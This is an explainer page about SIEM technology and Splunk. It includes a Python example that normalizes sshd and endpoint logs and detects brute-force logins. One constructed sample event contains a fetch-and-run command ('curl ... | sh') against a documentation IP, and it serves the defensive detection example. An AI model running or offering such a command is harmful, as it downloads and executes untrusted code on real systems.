Security Information and Event Management

Cyber Security Framework

Protect

Organizations must develop and implement the appropriate safeguards to limit or contain the impact of a potential cybersecurity event.

Identify

Organizations must develop an understanding of their environment to manage the cybersecurity risk to systems, assets, data and capabilities.

Detect

Organizations must implement the appropriate measures to quickly identify cybersecurity events.

Recover

Organizations must develop and implement effective activities to restore any capabilities or services that were impaired due to a cybersecurity event.

What is a SIEM?

Gartner defines SIEM “as a technology that supports threat detection and security incident response through the real-time collection and
historical analysis of security events from a wide variety of event and contextual data sources.”

So it’s like radar for cybersecurity professionals.
Basically, it collects the logs from everything on your systems and networks into one place so that you can analyze what is going on.

Why does Securicom partner with Splunk?


“Splunk Enterprise monitors and analyzes machine data from any source to
deliver Operational Intelligence to optimize your IT, security and business
performance.”

“Machine-generated data is one of the fastest growing and complex areas of
big data. It is also one of the most valuable, containing a definitive record of
all user transactions, customer behavior, machine behavior, security threats,
fraudulent activity and more. Splunk turns machine data into valuable insights
no matter what business you are in. It’s what we call Operational Intelligence.”

The SIEM Buyer’s Guide for 2020 from Splunk

Is SIEM technology new?


Not at all. It has been around for at least 15 years.
The difference is that today we have much more powerful tools to analyze the data that has been collected.
Modern analytics-driven SIEM solutions offer users a simple way to correlate information across all security-relevant data.
Your organization can spot threats as they unfold and act on them in near real time, rather than discovering them weeks later in an audit.

Where does the data come from?


Primarily it is gathered from server logs and network device logs (routers, switches and firewalls). SIEM data also comes from endpoint security tools, network security devices, applications, cloud services, authentication and authorization systems, and online databases of known vulnerabilities and threats (threat intelligence feeds).


What does a SIEM do with the data?


SIEM software then normalizes the data into a common format and analyses it to identify unusual behavior, system anomalies and other indicators of a security incident. The information is used for real-time event notification, compliance audits, reporting, performance dashboards, historical trend analysis and post-incident forensics.
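To make the two preceding sections concrete (data arriving from different sources, then being normalized and correlated), here is a small added example written for this page; it is not code from Splunk, Securicom or the Splunk buyer’s guide. It takes a handful of constructed sshd syslog lines and one constructed JSON endpoint event, maps both into one event schema, runs a brute-force correlation rule (five or more failed logins from one source IP within ten minutes followed by a successful login), and then enriches the resulting alert with a constructed threat-intelligence list and any follow-on activity from the same source. The log lines, IP addresses, the 2024 year assumed for the year-less syslog timestamps, and the indicator list are all made up for the example.

```python
import json
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample input (not from any real system): sshd syslog lines and one
# JSON event from a hypothetical endpoint agent, landing in the same SIEM.
SYSLOG_LINES = [
    "Mar 10 09:00:01 web01 sshd[1201]: Failed password for root from 203.0.113.5 port 51000 ssh2",
    "Mar 10 09:00:03 web01 sshd[1202]: Failed password for root from 203.0.113.5 port 51001 ssh2",
    "Mar 10 09:00:05 web01 sshd[1203]: Failed password for admin from 203.0.113.5 port 51002 ssh2",
    "Mar 10 09:00:07 web01 sshd[1204]: Failed password for root from 203.0.113.5 port 51003 ssh2",
    "Mar 10 09:00:09 web01 sshd[1205]: Failed password for root from 203.0.113.5 port 51004 ssh2",
    "Mar 10 09:00:12 web01 sshd[1206]: Accepted password for root from 203.0.113.5 port 51005 ssh2",
    "Mar 10 09:05:00 web01 sshd[1300]: Failed password for alice from 198.51.100.7 port 40000 ssh2",
    "Mar 10 09:05:30 web01 sshd[1301]: Accepted publickey for alice from 198.51.100.7 port 40001 ssh2",
]
JSON_EVENTS = [
    '{"ts": "2024-03-10T09:00:13Z", "host": "web01", "product": "edr", "action": "process_start",'
    ' "user": "root", "src_ip": "203.0.113.5", "cmd": "curl http://203.0.113.99/x.sh | sh"}',
]
# Constructed threat-intelligence indicator list (assumption: one known-bad IP).
IOC_IPS = {"203.0.113.5"}

SYSLOG_RE = re.compile(
    r"^(?P<mon>\w{3}) +(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) (?P<method>password|publickey) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src_ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)


def parse_syslog(line, year=2024):
    """Map an sshd syslog line onto the common event schema; None if unparseable."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    # Syslog lines carry no year; the year is an assumption of this example.
    ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
    return {
        "ts": ts, "host": m["host"], "source": "sshd", "user": m["user"],
        "src_ip": m["src_ip"],
        "action": "auth_success" if m["outcome"] == "Accepted" else "auth_failure",
    }


def parse_json(line):
    """Map a JSON endpoint event onto the same schema as the syslog events."""
    d = json.loads(line)
    return {
        "ts": datetime.strptime(d["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "host": d["host"], "source": d["product"], "user": d.get("user"),
        "src_ip": d.get("src_ip"), "action": d["action"], "cmd": d.get("cmd"),
    }


def detect_brute_force(events, threshold=5, window=timedelta(minutes=10)):
    """Correlation rule: >= threshold failures from one src_ip inside the window,
    followed by a success from that same src_ip, raises one alert."""
    failures = defaultdict(deque)  # src_ip -> timestamps of recent failures
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["src_ip"] is None:
            continue
        q = failures[ev["src_ip"]]
        while q and ev["ts"] - q[0] > window:  # expire failures older than the window
            q.popleft()
        if ev["action"] == "auth_failure":
            q.append(ev["ts"])
        elif ev["action"] == "auth_success" and len(q) >= threshold:
            alerts.append({
                "rule": "brute_force_success", "src_ip": ev["src_ip"], "user": ev["user"],
                "host": ev["host"], "failures": len(q), "ts": ev["ts"], "severity": "high",
            })
            q.clear()  # do not re-alert on the same burst of failures
    return alerts


def enrich(alert, events, iocs=IOC_IPS, follow=timedelta(minutes=5)):
    """Add threat-intel context and any non-auth activity from the same source
    shortly after the successful login; either one escalates the severity."""
    alert = dict(alert)
    alert["ioc_match"] = alert["src_ip"] in iocs
    alert["follow_on"] = [
        e for e in events
        if e["src_ip"] == alert["src_ip"]
        and e["action"] not in ("auth_failure", "auth_success")
        and alert["ts"] <= e["ts"] <= alert["ts"] + follow
    ]
    if alert["ioc_match"] or alert["follow_on"]:
        alert["severity"] = "critical"
    return alert


def run(syslog_lines=SYSLOG_LINES, json_lines=JSON_EVENTS):
    """Ingest both sources, normalize, correlate, enrich; returns the alert list."""
    events = [e for e in (parse_syslog(l) for l in syslog_lines) if e]
    events += [parse_json(l) for l in json_lines]
    return [enrich(a, events) for a in detect_brute_force(events)]


if __name__ == "__main__":
    for alert in run():
        print(json.dumps(alert, default=str, indent=2))
```

On the sample data the rule fires once, for 203.0.113.5 logging in as root after five failures; the second source (198.51.100.7) fails once and then succeeds with a key, which stays below the threshold and produces nothing. The normalization step is the part that makes the correlation possible: the sshd text lines and the JSON endpoint event only become comparable once both carry the same `src_ip`, `ts` and `action` fields.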

So what is a SIEM good for?


A SIEM supports and automates your cybersecurity work in these areas:
• Real-time monitoring
• Incident response
• User monitoring
• Threat intelligence
• Advanced analytics
• Advanced threat detection
• Use case library